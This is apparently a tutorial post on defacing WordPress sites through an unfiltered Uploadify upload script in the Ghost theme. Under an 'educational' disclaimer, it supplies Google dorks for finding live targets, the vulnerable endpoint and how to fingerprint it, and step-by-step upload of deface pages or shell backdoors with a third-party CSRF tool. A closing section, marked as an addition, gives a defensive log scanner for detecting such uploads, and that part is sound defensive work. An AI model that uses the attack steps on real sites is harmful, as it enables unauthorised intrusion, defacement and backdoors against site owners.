Deface POC WP Ghost Theme [LiveTarget] via Uploadify


⚠️ Disclaimer: This article is intended solely for educational purposes. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this content.

What Is the WP Ghost Theme Vulnerability?

The Ghost theme for WordPress has a weakness in the file upload_settings_image.php, which uses the Uploadify library. This bug allows files to be uploaded without any filtering, so an attacker can upload a deface script or even a shell backdoor.

Required Tools

  • 💻 A computer or phone
  • 🌐 An internet connection
  • 📝 A deface script (.txt, .jpg, .png, .gif, .htm, .html)
  • 🐚 A shell backdoor (optional)

Google Dorks for Finding Targets

inurl:wp-content/themes/Ghost/

inurl:wp-content/themes/Ghost/includes/

inurl:wp-content/themes/Ghost/includes/uploadify/

inurl:wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Exploit (endpoint)

wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Find targets using the Google dorks above. Focus on results whose path contains upload_settings_image.php.

Signs of a Vulnerable Target

When a vulnerable target is accessed, a JSON response like this usually appears:

{"status":"NOK", "ERR":"This file is incorect"}

👉 If the message above appears, the endpoint is active and the exploit can be attempted. If you get a 404 or a different error, it has most likely been patched.

Uploadify Exploitation Steps (PoC)

Step by Step

  1. Open an online CSRF tool: https://tools.prinsh.com/home/?tools=csrf
  2. Fill in the URL field with the exploit link (example: /upload_settings_image.php)
  3. Under Post File, enter: filedata
  4. Upload your favourite deface file or shell (e.g. sclu.html)
  5. Click Lock and send the request

Why does this work? Because the upload script does not filter file extensions and does not check the MIME type.

How to Access the Uploaded File

Uploaded files are usually stored in this folder:

/wp-content/uploads/settingsimages/

Example of accessing the uploaded script (SC):

https://target.com/wp-content/uploads/settingsimages/sclu.html
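As a defender-side addition that is not part of the original post: a small Python scanner that flags the three traces this technique leaves in a web server access log (a probe or POST to the Uploadify endpoint, and non-image files served from the settingsimages folder). The log lines, client addresses and timestamps are constructed samples, not data from a real site.

```python
import os
import re

# Apache/nginx "combined" access-log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Paths from the write-up above, compared case-insensitively because the theme
# folder may be installed as "Ghost" or "ghost".
UPLOADER_SUFFIX = "/includes/uploadify/upload_settings_image.php"
UPLOAD_DIR = "/wp-content/uploads/settingsimages/"
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def classify(line: str):
    """Return a finding tag for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0].lower()
    if path.endswith(UPLOADER_SUFFIX):
        # POST means a file was submitted; GET is someone checking whether the
        # endpoint answers (the "vulnerable target" fingerprint described above).
        return "upload_attempt" if m.group("method") == "POST" else "uploader_probe"
    if path.startswith(UPLOAD_DIR) and os.path.splitext(path)[1] not in IMAGE_EXT:
        # Only images belong here; .html/.php/.txt means the upload filter was bypassed.
        return "non_image_in_upload_dir"
    return None


def scan(lines):
    """Return (ip, tag, path) for every suspicious line, in log order."""
    findings = []
    for line in lines:
        tag = classify(line)
        if tag:
            m = LOG_RE.match(line)
            findings.append((m.group("ip"), tag, m.group("path")))
    return findings


# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:48 +0000] "GET /wp-content/uploads/settingsimages/sclu.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /wp-content/uploads/settingsimages/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, tag, path in scan(SAMPLE_LOG):
        print(f"{tag:25} {ip:15} {path}")
```

Feed it a real access log with `scan(open(path))`; a "non_image_in_upload_dir" hit is the strongest signal, since a patched or unaffected site never serves HTML from that folder.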